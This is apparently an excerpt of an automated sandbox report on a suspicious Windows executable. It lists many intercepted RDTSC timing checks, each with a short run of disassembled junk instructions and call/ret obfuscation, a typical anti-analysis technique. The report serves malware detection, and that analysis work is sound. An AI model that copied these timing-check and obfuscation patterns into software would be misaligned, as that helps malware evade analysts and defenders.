                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464E6 second address: E464F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA18C4F696h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E464F9 second address: E464FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4674B second address: E46759 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E46759 second address: E4675D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4776E second address: E47773 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E47773 second address: E47817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FCA18DB50F5h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FCA18DB50E8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push eax 0x00000029 jbe 00007FCA18DB50ECh 0x0000002f sub dword ptr [ebp+122D1E6Eh], ecx 0x00000035 pop edi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FCA18DB50E8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 call 00007FCA18DB50EEh 0x00000057 mov esi, eax 0x00000059 pop esi 0x0000005a mov dword ptr [ebp+122D29E4h], ecx 0x00000060 mov dword ptr [ebp+122D1F3Ah], esi 0x00000066 push 00000000h 0x00000068 cld 0x00000069 mov esi, dword ptr [ebp+122D3A4Ah] 0x0000006f xchg eax, ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FCA18DB50EBh 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49F17 second address: E49FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA18C4F6A2h 0x0000000b jng 00007FCA18C4F696h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FCA18C4F698h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 jmp 00007FCA18C4F6A2h 0x00000035 push 00000000h 0x00000037 sub dword ptr [ebp+1244A725h], ecx 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FCA18C4F698h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 mov esi, dword ptr [ebp+12451C24h] 0x0000005f xchg eax, ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 jnp 00007FCA18C4F69Ch 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49C91 second address: E49C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FA8 second address: E49FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FAE second address: E49FBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FBC second address: E49FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E49FC1 second address: E49FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4A958 second address: E4A95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4BCF3 second address: E4BD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18DB50F2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4C784 second address: E4C79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F6A6h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4E8CA second address: E4E94C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FCA18DB50E8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push esi 0x00000026 movzx ebx, ax 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FCA18DB50E8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 sub ebx, dword ptr [ebp+122D399Ah] 0x0000004c mov edi, eax 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+124728F2h] 0x00000056 xchg eax, esi 0x00000057 jnc 00007FCA18DB50F1h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4C79F second address: E4C7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18C4F6A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4E94C second address: E4E951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4DAE8 second address: E4DAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4C7BA second address: E4C7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FCA18DB50E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4E951 second address: E4E957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E451A5 second address: E4522C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FCA18DB50F4h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FCA18DB50E8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1D81h], ecx 0x00000035 lea eax, dword ptr [ebp+1247EBA0h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007FCA18DB50E8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov edi, dword ptr [ebp+122D3B22h] 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e je 00007FCA18DB50E8h 0x00000064 push edi 0x00000065 pop edi 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E4522C second address: E45241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA18C4F6A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E87196 second address: E871B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E876FC second address: E87700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E87700 second address: E8770C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA18DB50E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8770C second address: E87724 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCA18C4F69Bh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8789F second address: E878A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E59D second address: E8E5B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E861 second address: E8E891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCA18DB50F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e ja 00007FCA18DB50E6h 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E891 second address: E8E8AB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA18C4F696h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCA18C4F69Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8E8AB second address: E8E8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA17 second address: E8EA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA2C second address: E8EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA32 second address: E8EA37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E8EA37 second address: E8EA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA18DB50E6h 0x0000000a popad 0x0000000b js 00007FCA18DB50E8h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FCA18DB50EDh 0x0000001d pushad 0x0000001e popad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 pushad 0x00000023 push esi 0x00000024 pop esi 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E95465 second address: E95481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A4h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9408A second address: E940A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E940A2 second address: E940BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCA18C4F6A1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E940BE second address: E940C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9420E second address: E94213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94213 second address: E94219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94219 second address: E9422C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F69Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E944CB second address: E944F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCA18DB5104h 0x0000000d jmp 00007FCA18DB50F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E944F2 second address: E944FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCA18C4F698h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E944FE second address: E9450C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jg 00007FCA18DB50ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B73 second address: E44B79 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B79 second address: E44B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B7F second address: E44B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44B83 second address: E44BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov dl, 9Bh 0x00000011 mov edi, dword ptr [ebp+122D1D5Eh] 0x00000017 popad 0x00000018 mov ebx, dword ptr [ebp+1247EBDFh] 0x0000001e mov edx, dword ptr [ebp+122D39E6h] 0x00000024 jmp 00007FCA18DB50EDh 0x00000029 add eax, ebx 0x0000002b mov cx, di 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCA18DB50F5h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E44BDF second address: E44C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94640 second address: E94644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E94644 second address: E9464A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9516D second address: E95175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9895A second address: E9897D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FCA18C4F696h 0x0000000a jmp 00007FCA18C4F6A9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9897D second address: E98988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E98C62 second address: E98C6E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCA18C4F696h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E98C6E second address: E98C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C39D second address: E9C3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18C4F6A2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C3B3 second address: E9C3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C3B7 second address: E9C3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA18C4F6A0h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9C80C second address: E9C829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: E9CC1D second address: E9CC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA453A second address: EA453E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA453E second address: EA4561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FCA18C4F6A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA308B second address: EA30A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a jbe 00007FCA18DB50E6h 0x00000010 pop edx 0x00000011 popad 0x00000012 jng 00007FCA18DB50F6h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA30A9 second address: EA30AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3649 second address: EA365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA18DB50EBh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA365C second address: EA3669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCA18C4F696h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F5C second address: EA3F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F64 second address: EA3F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F68 second address: EA3F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F71 second address: EA3F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA3F7F second address: EA3F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCA18DB50E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA4253 second address: EA4257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA4257 second address: EA425B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA425B second address: EA4267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA18C4F696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EA4267 second address: EA426C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAC987 second address: EAC99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCA18C4F696h 0x0000000a je 00007FCA18C4F696h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EACAF3 second address: EACAFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EACF06 second address: EACF1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
